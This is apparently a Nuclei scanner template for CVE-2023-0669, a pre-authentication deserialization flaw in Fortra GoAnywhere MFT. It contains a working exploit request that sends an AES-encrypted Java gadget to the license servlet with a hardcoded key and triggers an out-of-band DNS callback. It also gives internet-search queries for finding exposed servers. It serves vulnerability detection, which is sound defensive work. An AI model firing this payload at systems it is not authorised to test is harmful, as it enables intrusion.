id: CVE-2023-0669 info: name: Fortra GoAnywhere MFT - Remote Code Execution author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch severity: high description: | Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. This stems from a pre-authentication command injection vulnerability in the License Response Servlet. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1 - https://infosec.exchange/@briankrebs/109795710941843934 - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0669 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 epss-score: 0.96969 epss-percentile: 0.99729 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer shodan-query: - http.favicon.hash:1484947000 - http.favicon.hash:1484947000,1828756398,1170495932 fofa-query: - app="goanywhere-mft" - icon_hash=1484947000 - icon_hash=1484947000,1828756398,1170495932 zoomeye-query: app:"fortra goanywhere-mft" tags: cve2023,cve,rce,goanywhere,oast,kev,fortra http: - raw: - | POST /goanywhere/lic/accept HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - 'GoAnywhere' - type: status status: - 500 # digest: 4a0a004730450220648bf29359218c50ca1e8a6a9165e91f5e5b955e3a3e299dd9198dcd13298c5d02210082f9f193883c0050df48f43afcf3d87d19b402ca3383a50b25d4220ae6d7afdf:922c64590222798bb761d5b6d8e72950